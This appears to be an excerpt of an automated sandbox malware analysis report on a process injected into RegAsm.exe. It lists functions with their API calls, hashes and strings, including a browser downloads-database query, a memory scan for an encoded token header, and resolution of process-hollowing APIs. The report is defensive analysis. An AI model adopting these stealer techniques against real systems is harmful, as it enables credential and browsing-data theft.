                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 167551676-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c1c4ac1ed6e2d5e65371575c7c6f7eac02c140687c42abe241e93945ccb91e40
                                                                                                                                                                                                                                                                                                  • Instruction ID: 83ca6cd176221eaf65384a2e70bd6f3e35ae6f3ada24e69a7023b9efa6df4b42
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1c4ac1ed6e2d5e65371575c7c6f7eac02c140687c42abe241e93945ccb91e40
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8341E6B190021CABDB15EBA0CC86FDD7778AB0C704F40469EF71567191DBB8A788CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040F5B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0040F63F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419566: std::exception::_Copy_str.LIBCMT ref: 00419581
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040F654
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419619: RaiseException.KERNEL32(?,0040F659,-00000208,LpB,?,0040F659,0040FC50,0042BEB0,-00000208), ref: 0041965B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F4D0: std::exception::exception.LIBCMT ref: 0040F4FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F4D0: __CxxThrowException@8.LIBCMT ref: 0040F514
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F69B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisememcpystd::exception::_
                                                                                                                                                                                                                                                                                                  • String ID: LpB$@
                                                                                                                                                                                                                                                                                                  • API String ID: 2091982303-1565407916
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4333e615859341e27a2035b722db1ecd76a15d6bd226179dd932d378d2aa88fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f50dfa9357fd886a065189dff06607fe605b6ea8e0eb8b68f4edf33fbd1ec24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4333e615859341e27a2035b722db1ecd76a15d6bd226179dd932d378d2aa88fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9731D671D00205ABC724DF68C4817AEBBF4EB49360F10063BE826A7BD1D7799945CBE5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040F740 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F75A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: __CxxThrowException@8.LIBCMT ref: 0041F8BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8CB
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F797
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F843: std::exception::exception.LIBCMT ref: 0041F858
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F843: __CxxThrowException@8.LIBCMT ref: 0041F86D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F843: std::exception::exception.LIBCMT ref: 0041F87E
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F7F8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                  • API String ID: 85833692-4289949731
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1322e0bfc0ece0e981ff8d6d8efaddbd8ceb0bc611d6478e6d54d85e031a034c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56c7425758be6e3bb99524be21cfc8d06f86a068529a75faa899e35b8d6b0194
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1322e0bfc0ece0e981ff8d6d8efaddbd8ceb0bc611d6478e6d54d85e031a034c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1331B4333042149BD730AE5CE880A5AF799EBA1764B24063FF151DB7C1D7759C4983AA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C82F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C82F480
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: LoadLibraryW.KERNEL32(shell32,?,6C86D020), ref: 6C7FF122
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7FF132
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C82F555
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8014B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C801248,6C801248,?), ref: 6C8014C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8014B0: memcpy.VCRUNTIME140(?,6C801248,00000000,?,6C801248,?), ref: 6C8014EF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C7FEEE3
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C82F4FD
                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C82F523
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                                  • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2681d241c04afef4dc79391f5c304fb944ad57770b5efa4de52e86d5a2271b2a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 240e8fd86b2df5a24f7c646c76edce8b12a1afc3ba5e5baf4678cfc5731de2f4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2681d241c04afef4dc79391f5c304fb944ad57770b5efa4de52e86d5a2271b2a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 834194706087209FD731DF69CA88A9BB7F4AF54318F100E28F59187650EB34D589CBE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8574A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 6C857526
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C857566
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C857597
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbdadff84050618fc755b2b011a2f984f422787253c42f63775b04dcdac31621
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00aaa1cbb94b7e2b5f346c432d2e62dc947329f94610250e86c595df2f827d4a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbdadff84050618fc755b2b011a2f984f422787253c42f63775b04dcdac31621
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99210B31701590ABCB358BAA8A19E9E33B5EB47368B50CD39D40587F40E764A851C6F1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C85C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C85C0E9), ref: 6C85C418
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C85C437
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C85C0E9), ref: 6C85C44C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                                  • Opcode ID: c676a176ed21b1de28c457654bb47c058b226bfe40afd5bf98d34b4ccb2b149f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1254a80bcfa3088251a6d12a8b92f72d3fbc6391bfc38d5a1a497fb525291b1a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c676a176ed21b1de28c457654bb47c058b226bfe40afd5bf98d34b4ccb2b149f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFE09A716053319BDB326BB28A0CB1A7BF9A75B21DF084535EA1592701FBB0D010CBB1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8575B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C85748B,?), ref: 6C8575B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C8575D7
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C85748B,?), ref: 6C8575EC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e53a052b63ad105b7041e3daa60ad3d350b9619d3646f0421c269a6e86e0e69
                                                                                                                                                                                                                                                                                                  • Instruction ID: eb21b092155d9db6cc59543da46ebcd9d531c45f6bce389bf1ee7b6cacb80270
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e53a052b63ad105b7041e3daa60ad3d350b9619d3646f0421c269a6e86e0e69
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E0E5B22003A1ABDB325BA2894C7193AF8EB5329CF00C435E90882700FBB89041CFB0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C857600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C857592), ref: 6C857608
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C857627
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C857592), ref: 6C85763C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-1050664331
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c3eff5ddce68d517e471601c950615142420a33dab4f938d1a8dae00dbd0311
                                                                                                                                                                                                                                                                                                  • Instruction ID: fcfde998e7c914cb7beee185854fb20f97b860e9ff01b326ace9607e071e3928
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c3eff5ddce68d517e471601c950615142420a33dab4f938d1a8dae00dbd0311
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE01A752103A09BDF325BA6894C71D3AF9E72729DF008435E908C2740F7B89440CFB4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00408330 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 299stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00408628
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040863C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                  • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                                                                  • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fec0125c66a970581299f07881c9bc933c2ef135ce78adbcda2adbdf9e4d0c0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 916fa3167f108e3fc0815a10e9a8fa09d5f34994d21b7567e67980bf6122bbf9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fec0125c66a970581299f07881c9bc933c2ef135ce78adbcda2adbdf9e4d0c0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55C16D71801248EACB14EBA4C951BDDBBB9AF19304F54417EE506732D2DF786B0CC769
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040F1E0 Relevance: 7.7, APIs: 5, Instructions: 165stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F1F5
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F222
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F010: strlen.MSVCRT ref: 0040F01D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F010: strlen.MSVCRT ref: 0040F037
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F010: strlen.MSVCRT ref: 0040F0F2
                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FBF1,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F26E
                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F354
                                                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0040F363
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
